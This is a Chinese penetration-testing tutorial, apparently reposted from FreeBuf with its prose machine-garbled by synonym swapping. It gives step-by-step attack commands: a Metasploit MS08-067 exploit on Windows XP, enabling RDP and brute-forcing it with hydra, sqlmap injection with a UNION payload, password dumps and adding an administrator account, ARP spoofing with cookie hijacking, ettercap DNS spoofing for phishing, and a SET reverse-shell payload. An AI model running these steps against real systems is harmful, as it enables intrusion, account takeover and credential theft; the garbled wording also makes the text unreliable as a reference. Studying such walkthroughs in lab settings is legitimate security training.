弊端 利用 阶段利用 已得到 的信息和各种攻击本领 实行 渗出 。网络应用程序弊端 诊断项目标 加密通讯 弊端 诊断是必须实行 的 。顾名思义,利用 弊端 ,到达 攻击的目标 。
Metasploit Framework
rdesktop + hydra
Sqlmap
Arpspoof
tcpdump + ferret + hamster
Ettercap
SET
Metasploit Framework
1
Metasploit是一款开源的安全弊端 检测工具,Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开辟 框架。它是一个强大 的开源平台 ,供开辟 ,测试和利用 恶意代码,这个环境 为渗出 测试、shellcode 编写和弊端 研究提供了一个可靠平台 。这种可以扩展的模子 将负载控制(payload) 、编码器(encode)、无操纵 天生 器(nops)和弊端 整合在一起 ,使 Metasploit Framework 成为一种研究高危弊端 的途径。它集成了各平台上常见的溢出弊端 和盛行 的 shellcode ,而且 不绝 更新。
概要:MSF架构、组件
实例演示:入侵Windows XP SP3 (ms08_067)
MSF架构
Metasploit Framework并不止具有exploit(溢出)网络 功能,它使你专注于创建本身 的溢出模块大概 二次开辟 。很少的一部分 用汇编和C语言实现,别的 均由ruby实现。总体架构:
TOOLS:集成了各种实用工具 ,多数为网络 的别的 软件
PLUGINS:各种插件,多数为网络 的别的 软件。直接调用其API,但只能在console工作。
MODULES:如今 的Metasploit Framework 的各个模块
MSF core :表现 Metasploit Framework core 提供根本 的API ,而且 界说 了MSF的框架 。
并将各个子体系 集成在一起。构造 比力 散乱,不发起 更改。
MSF Base:提供了一些扩展的 、易用的API以供调用,答应 更改
Rex LIBRARIES:Metasploit Framework中所包罗 的各种库 ,是类、方法和模块的聚集
CLI:表现 下令 行界面
GUI:图形用户界面
Console:控制台用户界面
Web:网页界面,如今 已不再支持
Exploits:界说 实现了一些溢出模块,不含payload的话是一个Aux
Payload:由一些可动态运行在长途 主机上的代码构成
Nops:用以产生缓冲区添补 的非操纵 性指令
Aux:一些辅助模块 ,用以实现辅助攻击,如端口扫描工具
Encoders:重新举行 编码,用以实现反检测功能等
进入msfconsole后可设置 数据库来更方便更快速的查询各种模块
起首 启动postgresql
sudo systemctl start postgresql
切换到postgresql
su postgres
创建一个postgresql数据库账户
create user root –P
接着 ,会提示输入暗码 ,然后确认暗码
创建数据库
createdb --owner=root nexp_db
owner参数指定命 据库的全部 者,后一个参数为数据库名称
然退却 出进入MSF毗连 数据库
db_connect root:toor@localhost/nexp_db
毗连 乐成 后会提示:
[-] postgresql already connected to msf
[-]Run db_disconnect first if you wish to connect to a different database
msfconsole支持体系 全部 下令 ,在终端中输入help可以查察 “Core Commands ”、“Database Backend Commands” 、“Exploit Commands”
MSF集成的几种弊端 扫描组件
2
Nmap
Nmap实用 于Winodws、Linux、Mac等操纵 体系 。它用于主机发现、端口发现或罗列 、服务发现 ,检测操纵 体系 、硬件地点 、软件版本以及脆弱性的弊端 。Metasploit Framework平台集成了Nmap组件。通常在对目标 体系 发起攻击之前必要 举行 一些须要 的信息网络 ,如获取网络中的活动 主机 、主机开放的端口等 。
Nessus
Nessus是当前利用 最广泛的弊端 扫描工具之一。Nessus采取 client/sever模式,服务器端负责举行 安全查抄 ,客户端用来设置 管理服务器端。在服务端还采取 了plug-in的体系,答应 用户参加 实行 特定功能的插件,这插件可以举行 更快速和更复杂的安全查抄 。
nmap举行 端口扫描
nmap -sS -v www.hdu.edu.cn -oX Desktop/out.xml
通过db_import下令 导入已生存 的扫描结果
db_import Desktop/out.xml
利用 hosts下令 查察 包罗 在XML格式的扫描结果 中的对象
利用 services下令 具体 查察 下列开放端口的相干 服务信息
利用 notes下令 按扫描结果 表现 的端口导出具体 信息
实例演示MSF入侵WinXP(ms_08067)
3
环境 :
Windows XP SP3
IP:172.16.211.129
Kali Linux
IP:172.16.211.128
实行 原理
弊端 名称:Windows Server服务RPC哀求 缓冲区溢出弊端 (MS08-067)
此安全更新办理 了服务器服务中一个机密 陈诉 的弊端 。假如 用户在受影响的体系 上收到特制的 RPC 哀求 ,则该弊端 大概 答应 长途 实行 代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 体系 上,攻击者大概 未经身份验证即可利用 此弊端 运行恣意 代码 。 此弊端 大概 用于举行 蠕虫攻击。 防火墙最佳做法和标准 的默认防火墙设置 有助于掩护 网络资源免受从企业外部发起的攻击。
实行 过程
在msfconsole利用 search下令 搜刮 MS08067弊端 攻击程序
从结果 中得到
Name : exploit/windows/smb/ms08_067_netapi
Disclosure Date:2008-10-28
Rank:great
Deion:MS08-067 Microsoft Server Service Relative Path Stack Corruption
利用 use下令 调用MS08067弊端 攻击程序
use exploit/windows/smb/ms08_067_netapi
利用 show options 下令 查察 必要 设置的选项
从图中可以看到还需设置RHOST(目标 地点 )、Exploit target(攻击目标 )
利用 set 下令 设置 Module Options,此处必要 设置目标 IP
即 set RHOST 172.16.211.129
利用 set 下令 设置后 ,可再利用 show options 下令 查察 设置环境
从中可以看出目标 IP已经设置好
接着设置Exploit target,利用 show targets 查察 可选项
可以看出以下版本的体系 均存在此弊端
由于 实例演示的XP体系 为WinXP SP3 简体中文版,即
利用 set target 下令 设置目标 ,此处即为set target 34
此时再用show options 可以看到全部设置完成,接着利用 exploit 大概 run 举行 攻击
实行 exploit下令 后得到一个meterpreter
在meterpreter中输入shell即可进入CMD窗口
接着即可实行 CMD下令 ,比方 打开RDP服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
利用 netstat -an下令 查察 端口是否开放,从图中可以看到已经开放
接着利用 net user下令 查察 XP体系 中的用户
可以看到存在一个用户为sysorem
然后针对指定用户比如 这里的sysorem用户举行 登录暗码 爆破
hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
利用 hydra爆破暗码 得:12345接着就能直接登录XP举行 长途 控制
rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
SQLmap
4
sqlmap是一个主动 化的SQL注入工具 ,其重要 功能是扫描,发现并利用 给定的URL的SQL注入弊端 ,如今 支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采取 五种独特的SQL注入技能 ,分别是:
1)基于布尔的盲注,即可以根据返回页面判定 条件真假的注入 。
2)基于时间的盲注,即不能根据页面返回内容判定 任何信息 ,用条件语句查察 时间耽误 语句是否实行 (即页面返回时间是否增长 )来判定 。
3)基于报错注入,即页面会返回错误信息,大概 把注入的语句的结果 直接返回在页面中。
4)连合 查询注入 ,可以利用 union的环境 下的注入 。
5)堆查询注入,可以同时实行 多条语句的实行 时的注入。
概要:常用语法简单 先容
实例演示:实例演示通过一个注入点入侵一台服务器
常用语法先容
获取当前用户名称
sqlmap -u "https://url/news?id=1" --current-user
获取当前数据库名称
sqlmap -u "https://www.xxoo.com/news?id=1" —current-db
列表名
sqlmap -u "https://www.xxoo.com/news?id=1" --tables -D “db_name ”
列字段
sqlmap -u "https://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #
获取字段内容
sqlmap -u "https://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
实例演示通过一个注入点入侵一台服务器
目标 网站:某CMS
测试是否存在注入
sqlmap -u "https://xxx/newsInfo.php?news_id=1classsn=8001" --level 2
Payload
news_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766271,0x5a794e4d4a626f5857704c4959506c49507a58666b4c44717864664b596d586d797059515752464d,0x716a786b71),NULL,NULL-- PHMLclasssn=9003
查询数据库所属用户,返回ht_zhengke20%
sqlmap -u “https://xxx/newsInfo.php?news_id=1classsn=8001” --current-user
查询是否是管理员账户 ,返回true
sqlmap -u “https://xxx/newsInfo.php?news_id=1classsn=8001” --is-dba
数据库
sqlmap -u “https://xxx/newsInfo.php?news_id=1classsn=8001 ” --dbs
列数据库用户
sqlmap -u “https://xxx/newsInfo.php?news_id=1classsn=8001” --users
列数据库用户暗码
sqlmap -u “https://xxx/newsInfo.php?news_id=1classsn=8001” --passwords
得到ht_zhengke2用户的明文暗码 为ht_zhengke2
nmap扫描发现开放3389端口
进入sql shell
sqlmap -u “https://xxx/newsInfo.php?news_id=1classsn=8001” --sql-shell
在sqlshell中添加一个用户并提拔 到管理员
net user root 12345 /add
net localgroup administrators root /add
利用 新添加的用户长途 登录服务器
Arpspoof
5
由于局域网的网络流畅 不是根据IP地点 举行 ,而是根据MAC地点 举行 传输。以是 ,MAC地点 在A上被伪造成一个不存在的MAC地点 ,如许 就会导致网络不通 ,A不能Ping通C 。这就是一个简单 的ARP诱骗 ,利用 的是ARP协议的弊端 。每每 在内网渗出 中,可共同 其他工具用于网络嗅探 、流量挟制 等作用。
实例应用:
ARP诱骗 攻击及会话挟制
ARP断网攻击
下令 布局 :
arpspoof [-i interface] [-t target] host
-i 表现 网卡 ,-t 表现 目标
ARP诱骗 攻击
Windows XP SP3
IP:172.16.211.129
Kali Linux
IP:172.16.211.128
网关
IP:172.16.211.2
开启IP转发(可利用 cat查察 是否设置乐成 )
echo 1 /proc/sys/net/ipv4/ip_forward
重定向受害者的流量传送给攻击者
arpspoof -i eth0 -t 172.16.211.129 172.16.211.2
tcpdump抓包(利用 wireshark也可以)
由于 网关具有路由功能,因此只要监听本地 网卡流量就能得到目标 主机的流量 。
简单 用法: tcpdump -w cookie.cap #抓取全部 流量写入cookie.cap
举行 一段时间的诱骗 ,期间可以任意 欣赏 些网页 ,谈天 之类的,比如 如今 访问数字杭电,一段时间后克制 诱骗 、克制 抓包 ,并共同 利用 ferret处理 惩罚 抓取的流量。
简单 用法: ferret -r cookie.cap #处理 惩罚 抓取的流量
hamster
确保处理 惩罚 后的cookie.cap在root用户根目次 后,运行hamster
接着根据提示设置欣赏 器署理
Kali 自带的Firefox欣赏 器设置署理 如图
设置好署理 后欣赏 器中访问hamster或https://127.0.0.1:1234
点击左侧链接,已经乐成 挟制 cookie ,实现访问
ARP断网攻击
关闭本地 IP转发,当来自网关的流量到达本机时,目标 呆板 无法得到 来自网关的数据,从而“断网 ”
arpspoof -i eth0 172.16.211.1 172.16.211.128
ettercap
6
ettercap是一个强大 的诱骗 工具 ,可以或许 让测试职员 以极快的速率 创建和发送伪造的包、从网络适配器到应用软件各种级别的包 、绑定监听数据到一个本地 端口等。是中心 人攻击中常用到的辅助工具 。
不外 多先容 ,有爱好 的小搭档 可以自行相识 下
实例演示:MIMT之DNS诱骗 (垂纶 )
设置 dns(/etc/ettercap/etter.dns) 172.16.211.128为本机在局域网地点
开启本地 web服务
直接访问会返回apache默认页面
利用 下令 ettercap -G 启动ettercap,并选择Unifind sniffing举行 网卡设置
接着扫描存活的主机 ,扫描完毕点击下图的Hosts list
将网关地点 添加到 target1,将攻击目标 添加到 target2
接着设置中心 人攻击的情势 为ARP诱骗 ,并设置双向诱骗
接着启用dns_spoof插件
接着开始DNS诱骗
然后在目标 主机上欣赏 www.hdu.edu.cn 时就能到达 诱骗 的结果
DNS诱骗 在内网渗出 中每每 用于获取管理员信息、垂纶 等。比方 可以伪造内网路由器管理页面 ,诱骗 用户在管理页面输入真实账号暗码 等。
SET
7
SET是利用 社会工程学理论的工具集。它与metasploit毗连 ,主动 构建可应用于社会工程学技能 的微软最新楼弊端 、Adobe PDF弊端 、Java Applet弊端 等多种环境 。它不但 利用 方便,而且还能奇妙 地瞒过平凡 用户的眼睛。因此 ,也是极其伤害 的工具。
在shell中输入setoolkit启动SET,它可举行 社工、渗出 等测试,此处选1即社工
选择毗连 方式为4 ,创建一个payload和listener
由于 用于演示的体系 为WinXP 32bit,因此选择毗连 方式为2
接着设置本机IP和端口(此处端口设置为4445,克制 辩论 即可)
接着SET将启动MSF并通过以上设置的payloads后,当用户被诱导并逆向毗连 本机4445端口时 ,将会得到一个meterpreter,得到meterpreter后,可输入?查察 可用下令
比方 screenshot截屏
文/sysorem 泉源 /FreeBuf
作育 专业的网络安全人才 ,
成绩 良好 的安全“大牛“
QQ交换 群:204528261
A professional permanent Hong Kong space provider!
蜀ICP备2024069684号 Powered By 小孩姐. Theme By EscSeo学习网
